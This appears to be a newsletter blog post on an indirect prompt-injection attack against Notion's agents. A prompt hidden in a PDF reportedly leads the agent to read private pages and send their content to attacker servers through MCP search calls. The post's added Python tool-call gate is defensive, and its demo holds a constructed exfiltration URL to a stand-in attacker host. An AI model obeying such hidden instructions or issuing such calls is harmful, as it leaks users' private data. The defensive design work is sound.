ExoBrain
Tags: agentic AI, AI security, developer tools

When your note-taking agents betray you

Security research reveals that Notion’s new agents are vulnerable to indirect prompt injection attacks via MCP tools, highlighting critical architectural risks in agentic systems.


The accompanying image illustrates how attackers can exploit Notion (the popular note-taking app) and its new agents through indirect “prompt injection”. A malicious prompt hidden in an innocuous PDF manipulates the agent into reading the user’s pages and then using an “MCP” tool to search for that content in a series of calls… to the attacker’s servers! The agent then happily exfiltrates private material, likely without the user ever knowing. Last week we covered MCP’s promise of tool integration; this week’s security research reveals the less mature side of the new protocol. Solving this can’t rely on prompting alone: in this case Claude’s security guardrails couldn’t prevent the exploitation. There’s an urgent need to consider these scenarios when designing information-rich agentic systems, to introduce more architectural isolation, and to integrate filtering that may slow the dash to adopt but will ensure greater resilience.
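To make the “architectural isolation and filtering” recommendation concrete, here is an added example of a policy gate that sits between an agent and its MCP tool dispatcher. It is not Notion’s, Anthropic’s or any MCP implementation’s code; the tool names (`read_page`, `web_search`, `fetch_url`), the allowlisted host, and the page contents and URLs are all constructed for illustration. The gate applies two controls that do not depend on the model following instructions: network-bound tools may only reach allowlisted hosts, and no argument to a network-bound tool may carry text the agent has read from a private page during the session.

```python
"""Added example: a tool-call policy gate for an agent using MCP-style tools.

Not code from Notion, Anthropic or any MCP project. Tool names, hosts, page
text and URLs below are constructed placeholders.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Tools that can move data off the host. Everything else is treated as local.
NETWORK_TOOLS = {"web_search", "fetch_url"}
# Egress allowlist for network tools (hypothetical search backend).
ALLOWED_HOSTS = {"search.example-allowed.com"}
# Words per shingle for the taint match. Three catches short extracted values
# (e.g. a name or a figure); longer shingles let small fragments slip through.
SHINGLE = 3

_URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def _tokens(text: str) -> list[str]:
    return re.findall(r"[a-z0-9]+", text.lower())


def _shingles(text: str) -> set[tuple[str, ...]]:
    toks = _tokens(text)
    return {tuple(toks[i:i + SHINGLE]) for i in range(len(toks) - SHINGLE + 1)}


@dataclass
class Session:
    """Per-session state: word shingles of every private page read so far."""
    taint: set = field(default_factory=set)

    def record_private_read(self, text: str) -> None:
        # Called by the dispatcher whenever a local read tool returns page content.
        self.taint |= _shingles(text)


@dataclass
class ToolCall:
    name: str
    args: dict


def check_tool_call(session: Session, call: ToolCall) -> tuple[bool, str]:
    """Return (allowed, reason).

    Local tools always pass. A network tool is refused if any string argument
    embeds a URL whose host is not allowlisted, or if any string argument
    shares a shingle with content read from a private page this session.
    """
    if call.name not in NETWORK_TOOLS:
        return True, "local tool"
    for key, value in call.args.items():
        if not isinstance(value, str):
            continue
        for url in _URL_RE.findall(value):
            host = urlparse(url).hostname or ""
            if host not in ALLOWED_HOSTS:
                return False, f"{key}: egress to non-allowlisted host {host}"
        if _shingles(value) & session.taint:
            return False, f"{key}: argument carries content read from a private page"
    return True, "ok"


def demo() -> list[tuple[str, bool, str]]:
    """Run the gate over a constructed sequence of calls an injected agent might make."""
    session = Session()
    # Constructed private page content the agent read on the user's behalf.
    session.record_private_read(
        "Project Falcon budget is 2.4M, approved by Dana Reyes on 12 March."
    )
    calls = [
        ToolCall("read_page", {"page_id": "p-123"}),                       # local read
        ToolCall("web_search", {"query": "MCP protocol specification"}),   # benign search
        ToolCall("fetch_url", {"url": "https://collect.attacker.example/?d=Project+Falcon+budget+2.4M"}),
        ToolCall("web_search", {"query": "Project Falcon budget 2.4M Dana Reyes"}),
    ]
    return [(c.name, *check_tool_call(session, c)) for c in calls]


if __name__ == "__main__":
    for name, ok, reason in demo():
        print(f"{name:<12} {'ALLOW' if ok else 'BLOCK':<6} {reason}")
```

The two checks are deliberately independent: the host allowlist stops the “series of calls to the attacker’s servers” even when the taint match fails, and the taint match stops private content being smuggled through an allowlisted search backend’s query log. Word-shingle matching is a coarse approximation of data-flow tracking; an agent coerced into exfiltrating one or two words per call will evade it, which is why the egress allowlist, enforced outside the model, is the control to rely on.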